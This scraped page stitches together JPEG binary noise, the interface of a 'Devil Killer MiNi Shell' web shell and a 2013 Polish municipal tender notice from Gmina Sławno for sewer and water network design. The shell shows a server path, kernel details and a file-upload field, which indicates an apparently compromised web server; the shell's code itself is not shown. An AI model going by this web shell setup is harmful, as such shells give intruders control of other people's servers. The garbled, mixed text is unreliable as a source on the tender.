JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130827/170435-N-2013.html

<p class="kh_header"><b>Sławno: Opracowanie dokumentacji projektowej budowy sieci kanalizacji sanitarnej i wodociągowej w m. Sławsko oraz rozbudowy sieci wodociągowej w m. Warszkowo, Wrześnica i Łętowo gm. Sławno</b><br>
<b>Numer ogłoszenia: 170435 - 2013; data zamieszczenia: 27.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. M. C. Skłodowskiej 9, 76-100 Sławno, woj. zachodniopomorskie, tel. 059 8106229, faks 059 8107526.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej budowy sieci kanalizacji sanitarnej i wodociągowej w m. Sławsko oraz rozbudowy sieci wodociągowej w m. Warszkowo, Wrześnica i Łętowo gm. Sławno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej budowy wraz z uzyskaniem decyzji  pozwolenia na budowę: 
Zadanie nr 1 - opracowanie kompletnej dokumentacji projektowej budowy sieci kanalizacji sanitarnej i wodociągowej  w miejscowości Sławsko gm. Sławno. 
Założenia projektowe:
- długość sieci wodociągowej - ok.  5 km,
- sieć kanalizacji grawitacyjnej - ok. 5 km,
- sieć  tłoczna z dwiema pompowniami - 2,5 km.
- sieć wodociągowa zastąpi dotychczasową eksploatowaną sieć z rur azbestowych.
- instalacja kanalizacyjna i wodociągowa dla około 920 mieszkańców tj. około 170 szt. przyłączy,
- przyłącza wodociągowe zakończone izolowaną studnią wodomierzową z zestawem wodomierzowym, z podłączeniem do istniejących instalacji wewnętrznych,
- przyłącza kanalizacyjne zakończone studzienką kanalizacyjną z wykonaniem przyłączy tj. od studzienki do istniejących instalacji (kanalizacji sanitarnych wewnętrznych) wyprowadzonych z budynków,
- dla wszystkich działek posiadających status działki budowlanej niezabudowanej, zlokalizowanych wzdłuż projektowanej sieci, projekt sieci wodociągowej i kanalizacyjnej  powinien uwzględniać budowę przyłączy w granicach pasa drogowego,
- dokumentacja winna zawierać projekty odejść od sieci głównej zakończonych studnią w pasy ulic poprzecznych,
- ścieki należy odprowadzić instalacją tłoczną do oczyszczalni ścieków w Sławnie przy ul. Ogrodowej 1 do istniejącej studni  kanalizacyjnej przy wjeździe na oczyszczalnię,
- przyjęte przekroje projektowanych rurociągów obu sieci powinny zapewnić odbiór ścieków i dostarczanie odpowiedniej ilości wody z uwzględnieniem przyrostu liczby mieszkańców na terenach, które zgodnie z obowiązującym Miejscowym Planem Zagospodarowania Przestrzennego gm. Sławno przeznaczone są na cele rolne, a w Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Sławno przeznaczone są pod zabudowę mieszkaniową. W 2013 roku gmina Sławno przystąpi do zmiany planu miejscowego dla tych terenów. 
Miejscowość Sławsko objęta jest strefą ochrony krajobrazu kulturowego. Zakres strefy przedstawia załącznik graficzny nr 1 z MPZP miejscowości Sławsko Gmina Sławno.
Dolina rzeki Wieprzy część wsi Sławsko pomiędzy drogą powiatową a rz. Wieprzą to teren obszaru Natura 2000, Dolina  Wieprzy i Studnicy - kod obszaru PLH 220038.
Mapa ze Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Sławno stanowi załącznik graficzny nr 2 do SIWZ.
Obszar objęty projektem przedstawia załącznik graficzny nr 3 do SIWZ.
UWAGA: Podane powyżej długości sieci oraz ilość gospodarstw są orientacyjne i mają na celu zobrazowanie skali projektowanego zadania.
W celu właściwego rozpoznania skali trudności zadania niezbędna jest wizja terenowa wykonawcy przed złożeniem oferty. 
Szczegółowe założenia techniczne  do projektu budowy sieci zawarte są w załączniku nr 8 do SIWZ - Wytyczne szczegółowe do projektu budowy sieci kanalizacji sanitarnej i wodociągowej w Sławsku.
Zadanie nr 2 -opracowanie dokumentacji projektowej rozbudowy sieci wodociągowej  w m. Warszkowo, Łętowo, Wrześnica gm. Sławno.
Zadanie polega na wykonaniu dokumentacji projektowej rozbudowy sieci wodociągowej:
1) w miejscowości Warszkowo - około 900 m, 7 szt. przyłączy z zestawami wodomierzowymi (w pomieszczeniu technicznym odbiorcy) z przejściem pod torami PKP,
2) w miejscowości Wrześnica	 - około 350 m, 
3) w miejscowości Łętowo - około 650 m. 
Dla każdej z miejscowości wymagane jest oddzielne kompletne opracowanie z odrębnymi decyzjami pozwolenia na budowę i odrębne wyceny opracowania przedmiotowej dokumentacji projektowej.
1. Dla działek zabudowach przyłącza wodociągowe winny być zakończone izolowaną studnią wodomierzową z zestawem wodomierzowym, z podłączeniem do istniejącej instalacji wewnętrznej.
2. Dla działek budowlanych i rekreacyjnych niezabudowanych zlokalizowanych wzdłuż projektowanej sieci projekt sieci wodociągowej powinien uwzględniać budowę przyłączy do granicy pasa drogowego. 
II. Zakres przedmiotu zamówienia dla Zadania Nr 1 obejmuje: 
1) Opracowanie  map do celów projektowych w niezbędnym zakresie.
2) Ustalenie stanu własności działek objętych opracowaniem wraz z uzyskaniem zgody właścicieli na dysponowanie nieruchomością na cele budowlane.
3) Wykonanie projektu wstępnego.
4) Wykonanie projektu budowlano-wykonawczego - zgodnie z Rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 03.07.2003 r. oraz Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji  technicznych wykonania i odbioru  robót budowlanych oraz programu funkcjonalno -użytkowego, obejmującego:
a) niezbędne projekty instalacyjno-technologiczne;
b) przebudowę infrastruktury kolidującej;
c) uwzględnienie istniejącego systemu wodociągowego i drenarskiego na obszarze objętym projektem;
d) niezbędne  projekty konstrukcyjne;
e) określenie wielkości zakresu robót związanych z odbudową dróg, zgodnie                        z warunkami technicznymi, które należy uzyskać od zarządcy dróg - powiatowych i gminnych;
f) uzgodnienie z właścicielami, zarządcami działek bezkolizyjnego prowadzenia sieci oraz uzyskanie zgody od właścicieli nieruchomości na realizację planowanego przedsięwzięcia w formie umowy cywilno-prawnej - służebności przesyłu po uprzednim ustaleniu przebiegu sieci i przyłącza na mapie stanowiącej załącznik  graficznym  do umowy;
g) nawiązanie swojego opracowania do istniejącej hydroforni i warunków technicznych zamawiającego
h) uzgodnienie opracowanej dokumentacji z zamawiającym oraz innymi instytucjami wymaganymi obowiązującym prawem.
Ilość egz. dokumentów:   6 kompletów + 1 egz. w wersji elektronicznej w formie pdf i dwg lub kompatybilnej.
5) Wykonanie przedmiarów robót z wydzieleniem kosztów kwalifikowanych                                    i niekwalifikowanych - zgodnie z regulaminem konkursu Programu Operacyjnego Infrastruktura i Środowisko. 
Za wydatki kwalifikowane w zakresie budowy sieci kanalizacji sanitarnej lub wodociągowej mogą być uznane wydatki poniesione w opisanym poniżej zakresie:
a) budowa kanalizacji sanitarnej:
- w przypadku braku studzienki w granicach nieruchomości przyłączanej, za kwalifikowane mogą być uznane wydatki poniesione na budowę przewodów kanalizacyjnych zlokalizowanych poza granicami tej nieruchomości, natomiast w granicach nieruchomości przyłączanej tylko te odcinki, które służą do przyłączenia więcej niż jednego podmiotu;
- w przypadku, gdy w granicach nieruchomości przyłączanej do sieci zlokalizowana jest studzienka (lub przewidziano jej wybudowanie), za kwalifikowane mogą być uznane wydatki poniesione na budowę przewodów zlokalizowanych zarówno poza granicami tej nieruchomości, jak również w jej granicach, jednak nie dalej, niż do pierwszej studzienki (wraz ze studzienką) od strony granicy tej nieruchomości;
b) budowa sieci wodociągowej: 
- w tym przypadku za wydatki kwalifikowane mogą być uznane wydatki poniesione na budowę przewodów zlokalizowanych poza granicami nieruchomości przyłączanej,  a w granicach nieruchomości przyłączanej tylko te odcinki, które służą do przyłączenia więcej niż jednego podmiotu. 
Zamawiający zaleca projektowanie w jak największym zakresie przyłączy służących do podłączenia więcej niż jednego budynku.
Ilość egz. dokumentów: 2 egz. + 1 egz. w  wersji  elektronicznej zapisanej  w  formie pdf oraz ath lub kompatybilnej.
6) Wykonanie kosztorysów inwestorskich z wydzieleniem kosztów kwalifikowanych i niekwalifikowanych - zgodnie z regulaminem konkursu Programu Operacyjnego Infrastruktura i Środowisko,  zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego.
Ilość egz. dokumentów:  2 egz.+1 egz. w wersji elektronicznej zapisanej w  formie pdf oraz ath lub kompatybilnej.
7) Wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
Ilość egzemplarzy -1 egz.+1 egz. zapisany w wersji elektronicznej w formie pdf.
8) Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia  (BIOZ) zgodnie  z Rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia.
Ilość egzemplarzy - 1 egz. + 1 egz. zapisany w wersji elektronicznej w formie pdf).
9) Wykonanie dokumentacji geotechnicznej na potrzeby realizacji projektu.
10) Uzyskanie innych niezbędnych materiałów i uzgodnień w tym decyzji o środowiskowych  uwarunkowaniach.
11) Po zatwierdzeniu przez zamawiającego projektów budowlano-wykonawczych złożenie   w jego imieniu wniosku o wydanie pozwolenia na budowę oraz uzyskanie decyzji.
12) W ramach wynagrodzenia, o którym mowa w §4 projektu  umowy, Wykonawca będzie  prowadził nadzór  autorski na zasadach określonych w §14 projektu umowy.
13) Na każdym etapie prac Zamawiający zastrzega sobie prawo do wglądu i akceptacji opracowanego projektu budowlano-wykonawczego,  
III. Zakres przedmiotu zamówienia  dla Zadania Nr 2 obejmuje: 
1) Opracowanie  map do celów projektowych w niezbędnym zakresie.
2) Ustalenie stanu własności działek objętych opracowaniem wraz z uzyskaniem zgody właścicieli na dysponowanie nieruchomością na cele budowlane.
3) Wykonanie projektu wstępnego.
4) Wykonanie projektu budowlano-wykonawczego - zgodnie z Rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 03.07.2003 r. oraz Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji  technicznych wykonania i odbioru  robót budowlanych oraz programu funkcjonalno -użytkowego, obejmującego:
a) niezbędne projekty instalacyjno-technologiczne;
b) przebudowę infrastruktury kolidującej;
c) uwzględnienie istniejącego systemu wodociągowego i drenarskiego na obszarze objętym projektem;
d) niezbędne  projekty konstrukcyjne;
e) określenie wielkości zakresu robót związanych z odbudową dróg, zgodnie                        z warunkami technicznymi, które należy uzyskać od zarządcy dróg - powiatowych i gminnych;
f) uzgodnienie z właścicielami, zarządcami działek bezkolizyjnego prowadzenia sieci oraz uzyskanie zgody od właścicieli nieruchomości na realizację planowanego przedsięwzięcia w formie umowy cywilno-prawnej - służebności przesyłu po uprzednim ustaleniu przebiegu sieci i przyłącza na mapie stanowiącej załącznik  graficznym  do umowy;
g) nawiązanie swojego opracowania do istniejącej hydroforni i warunków technicznych zamawiającego;
h) uzgodnienie opracowanej dokumentacji z zamawiającym oraz innymi instytucjami wymaganymi obowiązującym prawem.
Ilość egz. dokumentów:  6 kompletów + 1 egz. w wersji elektronicznej w formie pdf i dwg lub kompatybilnej.
5) Wykonanie przedmiarów robót.
Ilość egz. dokumentów:  2 egz. + 1 egz. w  wersji  elektronicznej zapisanej  w  formie pdf oraz ath lub kompatybilnej.
6) Wykonanie kosztorysów inwestorskich zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego.
Ilość egz. dokumentów:  2 egz. + 1 egz. w wersji elektronicznej zapisanej w  formie pdf oraz ath lub kompatybilnej.
7) Wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
Ilość egz. dokumentów:  1 egz.+1 egz. zapisany w wersji elektronicznej w formie pdf.
8) Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia  (BIOZ) zgodnie  z Rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. w sprawie bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia.
Ilość egz. dokumentów:  1 egz. + 1 egz. zapisany w wersji elektronicznej w formie pdf.
9) Wykonanie dokumentacji geotechnicznej na potrzeby realizacji projektu.
10) Uzyskanie innych niezbędnych materiałów i uzgodnień w tym decyzji o środowiskowych  uwarunkowaniach. 
11) Po zatwierdzeniu przez zamawiającego projektów budowlano-wykonawczych złożenie w jego imieniu wniosku o wydanie pozwolenia na budowę oraz uzyskanie decyzji.
12) W ramach wynagrodzenia, o którym mowa w §4 projektu  umowy, Wykonawca będzie  prowadził nadzór  autorski na zasadach określonych w §14 projektu umowy.
13) Na każdym etapie prac Zamawiający zastrzega sobie prawo do wglądu i akceptacji opracowanego projektu budowlano-wykonawczego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 10 % wartości zamówienia zgodnie z opisem przedmiotu zamówienia podanym powyżej</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium: 
a) dla części I w wysokości 3.500,00 zł (słownie: trzy tysiące pięćset złotych 00/100);
b) dla części II w wysokości 700,00 zł (słownie: siedemset złotych 00/100).
2. Wadium można wnieść w formach przewidzianych w art. 45 ust. 6 ustawy Pzp.
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść na konto Zamawiającego: Bank Spółdzielczy Sławno Nr 50 9317 0002 0000 3131 2000 0030 z dopiskiem Wadium na opracowanie dokumentacji projektowej
5. W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
6. Kopię przelewu należy załączyć do oferty.
7. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego: Urząd Gminy w Sławnie, ul. M.C. Skłodowskiej 9, 76-100 Sławno - w Sekretariacie, pokój nr 10 (Zamawiający w tym przypadku nie żąda załączenia potwierdzenia wniesienia wadium do oferty).
8. Nie wniesienie wadium w terminie lub w sposób inny niż  określony w SIWZ spowoduje wykluczenie Wykonawcy, a jego oferta zostanie odrzucona na podstawie stosownych przepisów.
9. Zamawiający dokonuje zwrotu wadium zgodnie z postanowieniami art. 46 ustawy Prawo zamówień publicznych.
10. Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
11. Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych w art. 46 ustawy - Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku udziału w postępowaniu Wykonawców zostanie dokonana w oparciu                         o zasadę spełnia - nie spełnia na podstawie oświadczenia załączonego do oferty, zgodnie z wymaganiami określonymi przez Zamawiającego w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał minimum 2 (dwie) usługi polegające na opracowaniu dokumentacji projektowej,
- dla zadania nr 1 - sieci kanalizacji sanitarnej  z przepompowniami o dł. minimum 10 km dla każdej usługi, 
- dla zadania nr 2 - sieci wodociągowej o dł. minimum 1 km dla każdej usługi, 
w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania na formularzu lub w oparciu o formularz stanowiący Załącznik Nr 2 do SIWZ. Dokument należy złożyć wraz z dokumentami potwierdzającymi, że usługi zostały wykonane lub są wykonywane należycie. Ocena spełnienia warunku udziału w postępowaniu Wykonawców zostanie dokonana w oparciu o zasadę spełnia - nie spełnia na podstawie oświadczeń i dokumentów załączonych do oferty, zgodnie z wymaganiami określonymi przez Zamawiającego w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku udziału w postępowaniu Wykonawców zostanie dokonana w oparciu                         o zasadę spełnia - nie spełnia na podstawie oświadczenia załączonego do oferty, zgodnie z wymaganiami określonymi przez Zamawiającego w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku udziału w postępowaniu Wykonawców zostanie dokonana w oparciu                         o zasadę spełnia - nie spełnia na podstawie oświadczenia załączonego do oferty, zgodnie z wymaganiami określonymi przez Zamawiającego w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunku udziału w postępowaniu Wykonawców zostanie dokonana w oparciu                         o zasadę spełnia - nie spełnia na podstawie oświadczenia załączonego do oferty, zgodnie z wymaganiami określonymi przez Zamawiającego w niniejszym postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

